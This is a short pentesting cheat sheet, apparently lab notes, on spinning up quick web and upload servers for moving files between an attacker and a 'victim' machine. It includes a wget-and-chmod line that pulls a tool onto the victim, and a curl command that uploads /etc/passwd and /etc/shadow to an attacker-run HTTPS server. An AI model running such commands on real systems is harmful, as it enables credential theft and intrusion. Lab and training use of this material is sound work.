Local Web Server
Post

Local Web Server

Python3

Via web:

1
2
3
4
5
6
7
# On our machine:
python3 -m http.server 8888

# On victim machine:

wget http://10.10.16.5:8888/pspy64
chmod +x pspy64

Python2

1
python -m SimpleHTTPServer 7331

PHP

1
php -S 0.0.0.0:8080

Ruby

1
ruby -run -e httpd . -p 9000

Busybox

1
busybox httpd -f -p 10000

Surge.sh

This is an excellent option to host an Internet exposed web server. First we need to install surge with npm:

1
npm install --global surge

Then we need to execute the surge command and provide all the details needed to host our web server.

  • File’s path, all the files within will be hosted.
  • Name of your web server, this will be the subdomain you choose and it must have the surge.sh as domain, if it’s already taken it won’t work.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    
    surge             
    
     Running as shuciran@gmail.com (Student)
    
          project: /opt/test/
           domain: blue-eyed-harmony.surge.sh
           upload: [====================] 100% eta: 0.0s (1 files, 15 bytes)
              CDN: [====================] 100%
       encryption: *.surge.sh, surge.sh (48 days)
               IP: 138.197.235.123
    
     Success! - Published to blue-eyed-harmony.surge.sh
    

If this is the first time, you’ll need to provide an e-mail and a password.

If you want to exploit XSS, SSRF or any vulnerability from another server you’ll need to host a CORS file with content “*” this way you’ll allow consumption of resources from external entities.

Web Server Upload

Let’s see how we can configure the uploadserver module to use HTTPS for secure communication.

1) Install the uploadserver module.

1
Shuciran@htb[/htb]$ sudo python3 -m pip install --user uploadserver

2) Create a self-signed certificate.

1
Shuciran@htb[/htb]$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

The webserver should not host the certificate. We recommend creating a new directory to host the file for our webserver.

3) Start Web Server

1
2
3
4
5
Shuciran@htb[/htb]$ mkdir https && cd https
Shuciran@htb[/htb]$ sudo python3 -m uploadserver 443 --server-certificate /root/server.pem

File upload available at /upload
Serving HTTPS on 0.0.0.0 port 443 (https://0.0.0.0:443/) ...

4) Transfer the file via CURL

1
Shuciran@htb[/htb]$ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

We used the option –insecure because we used a self-signed certificate that we trust.